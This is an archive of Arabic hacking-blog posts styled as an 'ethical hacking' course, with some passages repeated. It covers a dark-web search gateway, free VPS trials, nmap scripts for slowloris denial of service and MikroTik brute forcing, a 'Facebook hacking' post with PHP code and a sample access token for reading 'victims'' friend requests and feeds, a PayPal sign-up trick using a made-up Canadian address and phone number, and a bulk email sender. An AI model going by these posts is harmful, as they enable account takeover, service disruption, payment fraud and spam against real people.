بسم الله الرحمن الرحيم
بناء على طلب صديقنا انيس
اضع بين ايديكم هذه لدورة الجميلة لختبار اختراق المواقع والسيرفرات
من اجل تنمية قدرة الهكر الاخلاقي العربي وليس من اجل افساد المواقع وتدميرها
فهرس الدورة
إظهار الرسائل ذات التسميات دعس المواقع. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات دعس المواقع. إظهار كافة الرسائل
السبت، 4 أبريل 2015
الأحد، 22 فبراير 2015
محرك بحث جديد للانترنت المظلم متوفر للجميع بدون متصقح التور
السلام عليكم ورحمة الله وبركاته
معكم سمير سلطاني من مدونة حاسوبي
onion city
http://onion.city
وهو محرك بحث يسهل عليك البحث في الدارك نت
والدخول اليه ايضا ، بدون استخدام متصفح التور
يعني على سبيل المثال اذا اردت الدخول الىموقع
2kcreatydoneqybu.onion ستحتاج الى متصفح التور
هذا رابط محرك بحث شبيه قوقل في الدركنت
والا لن يفتح الموقع لكن الان
ضع .city
grams7enufi7jmdl.onion
Tor Browser والا لن يفتح الموقع لكن الان
ضع .city
اخر الموقع
http://2kcreatydoneqybu.onion.city/
الإنترنت المظلم كمجموعة من ارتباطات الشبكة التي تستعمل بروتوكولات غير (HTTP) ولكنها موجودة على الشبكة العامة وتأسست بطريقة مغلقة وسرية بين أطراف موثوقة بين بعضها البعض. عادة يستعمل هذا النوع لغرض (peer-to-peer file sharing) (تشارك الملفات نظير إلى نظير) أو بين نظيرين.
الثلاثاء، 17 فبراير 2015
free vps
http://www.cloudshare.com/ (14 days trial)
https://east1.openhosting.com/accounts/trial/ (5 days trial)
http://www.vps.me/ (more than one year)
http://www.elastichosts.com/cloud-hosting/free-trial (5 days trial)
http://vexxhost.com/trial/ (7 days trial)
http://www.atum.com/ (15 days trial)
http://www.desktone.com/free_trial (7 days trial)
http://www.cloudee.eu/preorder (6 days trial)
http://www.host1free.com/free-vps/(6 days trial)
http://www.rsaweb.co.za/cloud-servers-free-trial/ (7 days trial)
http://www.sublimeip.com/services/cloud/free-trial/ (5 days trial)
الخميس، 5 فبراير 2015
تحميل كتاب لتعليم اختراق المواقع وكيفية التخفي وحماية المنتديات باللغة العربية
السلام عليكم ورحمة الله وبركاته
معكم سمير سلطاني من مدونة حاسوبي
في موضوع بسيط
وهو تحميل كتاب
تحميل و قراءة كتاب الهندسة العكسية
السلام عليكم ورحمة الله وبركاته
معكم سمير سلطاني من مدونة حاسوبي
اليوم ساضع لكم رابط تحميل كتاب الهندسة العكسية
الثلاثاء، 3 فبراير 2015
ما تخفيه اداة nmap
السلام عليكم
قد لا يعرف البعض ما تخفيه اداة nmap او لا يهتم بما قد تفعله هذه الاداه لا يهتم سوى بطريقة فحص الايبى لمعرفة هل البورتات
مفتوحه ام مغلقه واستخراج اصدار الخدمه الذى يعمل عليها البورت رقم كذا وكذا ومن ثم البحث عن ثغره بهدف الولوج الى الهدف
واختراقه ولكن توقف عن هذا واطلع على ما قد تحدثه هذه الاداه ان كنت لا تعرف اضافات تلك
الاداه القويه وهيا namp scripting engine نعم يوجد اسكريبتات لاداة nmap يوجد اسكريبتات عديده ولكل منها مهام ووظيفه يقوم بها
قد لا يعرف البعض ما تخفيه اداة nmap او لا يهتم بما قد تفعله هذه الاداه لا يهتم سوى بطريقة فحص الايبى لمعرفة هل البورتات
مفتوحه ام مغلقه واستخراج اصدار الخدمه الذى يعمل عليها البورت رقم كذا وكذا ومن ثم البحث عن ثغره بهدف الولوج الى الهدف
واختراقه ولكن توقف عن هذا واطلع على ما قد تحدثه هذه الاداه ان كنت لا تعرف اضافات تلك
الاداه القويه وهيا namp scripting engine نعم يوجد اسكريبتات لاداة nmap يوجد اسكريبتات عديده ولكل منها مهام ووظيفه يقوم بها
على سبيل المثال اسكريبت ssl-heartbleed ومهمة فحص برتكول ssl ان كان مصاب بثغرة نزيف القلب (heartbleed)
الثغره الشهيره التى احدثت ضجه فى عالم الانترنت يمكنك الاطلاع على هذا الرابط لمعرفة كيف يمكنك استخدام هذا الاسكريبت
فى فحص البرتكول واستغلال الثغره بستخدام metasploit
https://cyberarms.wordpress.com/…/detecting-openssl-heartb…/
يمكنك مشاهدة هذا الفيديو من تقديم شاجع فى كيفية الاستغلال
https://www.youtube.com/watch?v=fo30-4Isq90
اسكريبت namp_xml اسكريبت لعمل تقرير xml عن الهدف الخاص بك مما يسمح امكنيه اكثر فى رؤية البيانات وترتيب سلس فى
عرضها يمكنك مشاهدة هذا الفيديو لكيفية استخدامه
اسكريبت namp_xml اسكريبت لعمل تقرير xml عن الهدف الخاص بك مما يسمح امكنيه اكثر فى رؤية البيانات وترتيب سلس فى
عرضها يمكنك مشاهدة هذا الفيديو لكيفية استخدامه
https://www.youtube.com/watch?v=OQMuF1X9jDU
يمكنك الاستعلام عن بعض السجلات الخاصة بخوادم DNS ايضاً يمكنك عمل dos attack (هجوم حجب الخدمه) بستخدام http-slowloris
يمكنك مشاهدة الفيديو من اعداد شاجع
يمكنك الاستعلام عن بعض السجلات الخاصة بخوادم DNS ايضاً يمكنك عمل dos attack (هجوم حجب الخدمه) بستخدام http-slowloris
يمكنك مشاهدة الفيديو من اعداد شاجع
ويمكنك تحميله من هنا
بنسخ المحتوى ولصقه فى ملف نصى وحفظه بمتداد .nse او استخدام الامر wget https://svn.nmap.org/nmap/scripts/http-slowloris.nse
ان كنت من مستخدمى لينكس ايضاً
قد تلاحظ ان اسم الاسكريبت يوحى لوظيفته على سبيل المثال اسكريبت mikrotik-routeros-brute من اسمه يوحى
انه لعمل تخمين على لوحة تحكم الـ mikrotik بستخدام تكنك الهجوم العنيف (brut force attack) بهدف الحصول على
اسم المستخدم و كلمة المرور للولوج الى لوحة التحكم يمكنك الاطلاع على المزيد من المعلومات عن هذا الاسكريبت من خلال الرابط
http://nmap.org/nsedoc/scripts/mikrotik-routeros-brute.html
ومن لا يعرف ما هوا الميكروتك يمكنك الاطلاع على هذا الرابط
ان كنت من مستخدمى لينكس ايضاً
قد تلاحظ ان اسم الاسكريبت يوحى لوظيفته على سبيل المثال اسكريبت mikrotik-routeros-brute من اسمه يوحى
انه لعمل تخمين على لوحة تحكم الـ mikrotik بستخدام تكنك الهجوم العنيف (brut force attack) بهدف الحصول على
اسم المستخدم و كلمة المرور للولوج الى لوحة التحكم يمكنك الاطلاع على المزيد من المعلومات عن هذا الاسكريبت من خلال الرابط
http://nmap.org/nsedoc/scripts/mikrotik-routeros-brute.html
ومن لا يعرف ما هوا الميكروتك يمكنك الاطلاع على هذا الرابط
ar.wikipedia.org/wiki/مايكروتك
ولاستخدامه اطلع على خانة Example Usage با الاسفل
ولاضافة الاسكريبتات للاداه فى كالى اتبع المسار usr/share/nmap/scripts
الكثير والكثير فى الـ namp scripting engine يمكنك الاطلاع على باقى الاسكريبتات هنا
ولاستخدامه اطلع على خانة Example Usage با الاسفل
ولاضافة الاسكريبتات للاداه فى كالى اتبع المسار usr/share/nmap/scripts
الكثير والكثير فى الـ namp scripting engine يمكنك الاطلاع على باقى الاسكريبتات هنا
والدخول لكل اسكريبت
ومعرفة وظيفة كل اسكريبت وطريقة استخدامه هذا هوا مدخل بسيط جداً لـ namp scripting engine والى اللقاء
ومعرفة وظيفة كل اسكريبت وطريقة استخدامه هذا هوا مدخل بسيط جداً لـ namp scripting engine والى اللقاء
الاثنين، 26 يناير 2015
معرفة زوار الموقع عن طريق الدوس
مرحبا بكل زوار مدونة حاسوبي
في هذا الموضوع البسيط
لمعرفة زوار الموقع عن طريق الدوس
tracert www.site.com
تطلع الايبهات للزوار ويمكنك مراقبتها
الأحد، 27 أبريل 2014
رؤية أخرى في إختراق الفايسبوك بستخدام الاكسس توكن access_token
السلام عليكم و رحمة الله تعالى و بركاته
معكم سمير سلطاني من مدونة حاسوبي
اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك
هي صعبة قليلا لكن أتمنى أن تتجاوبوا معي
تمام نبدأ على بركة الله 
Graph API Exploit
كما يعلم الكل أن الفايسبوك يحتوي على ملايين المشتركين
و بالتالي فهو يمثل المكان الأمثل لتطبيق مخططاتنا في الإختراق
Graph API Exploitرغم أن هاته الثغرة إستغلالاتها خطيرة
و أغلب المبرمجين الآن يستغلونها في التحكم بحسابات الفايسبوك
لأن المعلومات التي تقدمها مهمة جدا
إلا أنني لا أجد لها شروحات في المنتديات هناك من سيقول أن الثغرة تافهة
أنا أقولك لا أغلب الإستغلالات بقيت خاصة بمكتشفيها و لم يتم تسريبها في المنتديات
لخطروة إستغلالاتها
فبخبرة قليلة من البرمجة تتمكن من قراءة الرسائل الخاصة لأي حساب تريد
أو إرسال رسائل بأي حساب على الفايسبوك
ما هو ال Facebook Graph Api ؟
هو الرسم البياني لل Api
أي جوهر منصة الفايسبوك
برمجة منصة الفاسيبوك مبنية على Graph api
و من يستطيع التحكم في ال api
سيتمكن من قراءة و كتابة معطيات في الفايسبوك
الآن هل تريدون اللعب بال Graph Api ؟
حقا ؟
أوكي تابعوا معي الآتي
جرب أكتب الآتي
غير Username بحساب الضحية
تطلعلك معلومات كالآتي:
كود:
{ "id": "10000000565", "name": "name of victim", "first_name": "f name", "last_name": "l name", "link": "http://www.facebook.com/victim", "username": "victim", "gender": "male", "locale": "en_GB" }
تتم قراءة طلبات الصداقة للمستهدف من خلال قراءة Graph Api عن طريق إصدار
طلب "HTTP GET" لمستخدم access_token بإذن أو رخصة read_requests
التطبيق في المتصفح كالآتي:
كود:
https://graph.facebook.com/USER_ID/friendrequests
USER_ID = username
و عن كيفية الإستغلال
عبارة عن CODE PHP بسيط يوضح الإستغلال في قراءة طلبات الصداقة للضحايا
كود PHP:
<?php
$app_id = 'YOUR_APP_ID';
$app_secret = 'YOUR_APP_SECRET';
$my_url = 'YOUR_URL';
$code = $_REQUEST["code"];
echo '<html><body>';
if(!$code) {
// Get permission from the user to publish to their page.
$dialog_url = "http://www.facebook.com/dialog/oauth?client_id="
. $app_id . "&redirect_uri=" . urlencode($my_url)
. "&scope=read_requests";
echo('**********top.location.href="' . $dialog_url . '";</script>');
} else {
// Get access token for the user
$token_url = "https://graph.facebook.com/oauth/access_token?client_id="
. $app_id . "&redirect_uri=" . urlencode($my_url)
. "&client_secret=" . $app_secret
. "&code=" . $code;
$access_token = file_get_contents($token_url);
$notifications = "https://graph.facebook.com/me/friendrequests?"
. $access_token;
$response = file_get_contents($notifications);
$resp_obj = json_decode($response,true);
echo '<pre>';
print_r($resp_obj);
echo '</pre>';
}
echo '</body></html>';
?>
كود:
https://graph.facebook.com/APP_ID/banned
كود:
https://graph.facebook.com/APP_ID/banned/USER_ID
https://graph.facebook.com = API GRAPH
بروفايل الفايسبوك المستهدف = /me/
متغير يمكننا تغييره بحسب الحاجة مثلا أردت رؤية = friendsnewsfeed أغيره إلى "home"
227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
يمثل ال access_token
و يجب الحصول عليه من الضحية
بما أن البعض لم يفهم عمل ال php code
هو يستعمل فقط لقراة طلبات الصداقة ..الرسائل ...
ما إلى ذلك يمكنكم التعديل عليه ليتماشى مع الحاجة
بخصوص الحصول على الـ access_token
سهل عن طريق تطبيق فايسبوك
ضروري تغيير /me/ بــ username الشخص المستهدف
و بالتالي الإستغلال يكون كالآتي :
لرؤية طلبات الصداقة للضحية
كود:
https://graph.facebook.com/me/friends?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
كود:
https://graph.facebook.com/me/home?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
يعني رؤية البروفايل
كود:
https://graph.facebook.com/me/feed?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
أتمنى أن أكون اليوم بشرحي هذا لكم قد وفقت في توضيح بعض الأمور لكم
حتى و لو كانت قليلة و لكنها مجرد بداية
ستمكنكم من دخول إختراق الفايسبوك من بابه الواسع
هي مجرد فكرة و أنتظر منكم تطوريها
الاثنين، 24 مارس 2014
انشاء حساب في بنك بيبال شبه مفعل
انشاء حساب بيبال شبه مفعل
أولا لنعرف الفرق بين حساب مفعل و غير مفعل
الحساب المفعل يمكن شحنه قدر ما تشائ و الغير مفعل هو عكسه
لكن اليوم سأريكم طريقة الحصول على بايبال غير مفعل و يمكن أن يشحن بتقريبا 1000$ لنبدأ :
أولا ادخل للموقع بايبال،
ونقوم بالتسجيل لانشاء حساب
نختار الدولة canada
إختر student طالب
و Social Insurance Number اتركها فارغة
اكتبproactive 1
في Address line 1 و Canada
في و اختر Quebec في Province و في اكتب G1A 1C5
اما في رقم الهاتف اكتب هذا الرقم 4-158-656-599
وآخيرا إضغط Agree and create account
إذا قمت بكل الخطوات بالشكل الصحيحة ستظهر نافذة فيها لكي تربط حسابك بحساب بنكي لا تفعل شيئ في آخر الصفحة سترى
Go to my account إضغط عليها هذا هو حسابك ^^
الآن آخر خطوة تبديل العملة لدولار الأمريكي
إذهب للبروفيل Profile ثم الى اضغط على My money
ثم Currencies
وآخيرا إختر US Dollar و اضغط على make primary
و هكذا ينتهي درسنا، إذا أعجبك الموضوع انشره
لا تنسى الاشتراك في قناتي وزيارة صفحتي على الفيسبوك
برنامج Email Sender Deluxe لارسال رسائل من جهاز الكمبيوتر الى قوائم بريدية
حمل برنامج Email Sender Deluxe لارسال رسائل من جهاز الكمبيوتر الى قوائم بريدية يمكنك بسهولة استيراد قوائم بريدية من قواعد البيانات المختلفة مثل ال SQL , Excel وغيرها , بحيث يعمل بارسال كثير من الايميلات الى الاف الايميلات من قواعد البيانات , حمل برنامج Email Sender Deluxe فهو سهل الاستخدام وسهل في عمله ولا يشكل ضغط ويرسل الى ال Inbox ويمكنك التحكم بشكل الرسائل
للتحميل
للتحميل
الاشتراك في:
الرسائل (Atom)